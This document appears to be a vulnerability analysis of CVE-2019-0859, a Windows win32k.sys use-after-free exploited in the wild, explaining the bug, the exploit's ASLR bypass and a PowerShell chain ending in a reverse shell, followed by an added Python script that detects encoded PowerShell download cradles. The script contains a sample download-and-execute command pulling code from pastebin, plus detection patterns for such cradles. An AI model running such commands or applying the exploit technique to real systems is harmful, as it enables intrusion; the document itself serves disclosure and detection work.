In March 2019, Kaspersky's automatic exploit-prevention systems detected an attempt to exploit a vulnerability in Microsoft Windows. Further analysis revealed a zero-day vulnerability and pinned its exact location to win32k.sys. This is the fifth Windows security flaw identified by the company's researchers in the past few months; the previous ones are:
Kaspersky's researchers reported these findings to Microsoft. Microsoft investigated them, confirmed them and released patches; the vulnerability discussed below, CVE-2019-0859, was fixed in the April 2019 Patch Tuesday update. Credit for the discovery goes to Kaspersky researchers Vasiliy Berdnikov and Boris Larin.
To obtain the corresponding updates, visit Microsoft's website.
CVE-2019-0859 is a use-after-free vulnerability in the CreateWindowEx function. While creating a window, CreateWindowEx sends the WM_NCCREATE message to the new window. By using the SetWindowsHookEx function, it is possible to install a custom callback that handles the WM_NCCREATE message right before the window procedure is called.
In win32k.sys every window is represented by a tagWND structure, which has an "fnid" field, also known as the Function ID. The field defines the class of a window: all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.
During the WM_NCCREATE callback, the Function ID of the window is still 0, which allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address of the window procedure that is executed immediately after our hook. Changing the window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc, which sets the Function ID to FNID_MENU because the current message is WM_NCCREATE. The crucial part is that manipulating the extra data before the Function ID is set to FNID_MENU can force xxxMenuWindowProc to abort initialization of the menu and return FALSE. As a result, delivery of the WM_NCCREATE message is treated as a failed operation and CreateWindowEx stops with a call to FreeWindow. Because our MENU-class window was never actually initialized, we gain control over the address of the memory block that is freed.
The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.
After successful exploitation, the exploit ran PowerShell with a Base64-encoded command. The main purpose of this command was to download a second-stage script from https//pastebin.com. The second-stage PowerShell script executes the final, third stage, which is also a PowerShell script.
The third script is very simple and does the following:
The main goal of the shellcode is to establish a trivial HTTP reverse shell, which gives the attacker full control over the victim's system.
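The launcher chain described above, an encoded PowerShell command that fetches a second stage from pastebin.com and evaluates it, is what a detection engineer would hunt for in process-creation telemetry. The following is an added example and not code from Kaspersky's write-up: it decodes -EncodedCommand arguments (Base64 over UTF-16LE, which is what PowerShell expects) and scores a command line on the indicators the text names. The log layout, file paths, the stage-one script text and the pastebin URL path are constructed for the example and are not the real artifacts from the attack.

```python
import base64
import re

# Command-line features that, in combination, match the stage-one PowerShell
# launcher described in the text: an encoded command, a hidden window, and a
# download cradle that pulls the next stage from pastebin.com and evaluates it.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "paste_site": re.compile(r"pastebin\.com", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Sysmon-style process-creation record reduced to the two fields we need
# (constructed layout for this example, not a real Sysmon export).
LOG_RECORD = re.compile(r"Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid.

    PowerShell expects the Base64 to wrap UTF-16LE text; decoding it as UTF-8
    (a common mistake in quick triage scripts) yields garbage.
    """
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Score one PowerShell command line; the decoded payload is scanned as well."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {name for name, pattern in INDICATORS.items() if pattern.search(haystack)}
    if decoded is not None:
        hits.add("encoded_command")
    return {
        "decoded": decoded,
        "indicators": sorted(hits),
        # An encoded command on its own is common in legitimate automation;
        # require a second indicator before flagging the process.
        "suspicious": len(hits) >= 2,
    }


def scan_logs(lines):
    """Return one analysis per PowerShell process-creation record, in input order."""
    results = []
    for line in lines:
        record = LOG_RECORD.search(line)
        if record is None:
            continue
        if "powershell" not in record.group("image").lower():
            continue
        results.append(analyze_command_line(record.group("cmd")))
    return results


def encode_for_powershell(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records. The pastebin path is a placeholder, not the
# paste used by the real exploit.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/placeholder')"
SAMPLE_LOGS = [
    f'Image={PS_IMAGE} CommandLine=powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    f"Image={PS_IMAGE} CommandLine=powershell.exe -nop -w hidden -enc {encode_for_powershell(STAGE_ONE)}",
    r"Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c whoami",
    f"Image={PS_IMAGE} CommandLine=powershell.exe -enc {encode_for_powershell('Get-Date')}",
]

if __name__ == "__main__":
    for result in scan_logs(SAMPLE_LOGS):
        print(result["suspicious"], result["indicators"])
```

The threshold of two indicators is deliberate: plenty of legitimate tooling uses -EncodedCommand, but an encoded, hidden-window PowerShell that downloads and evaluates a script from a paste site is the pattern this campaign's launcher exhibits, and the benign encoded `Get-Date` record in the sample stays below the threshold.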
Source: Kaspersky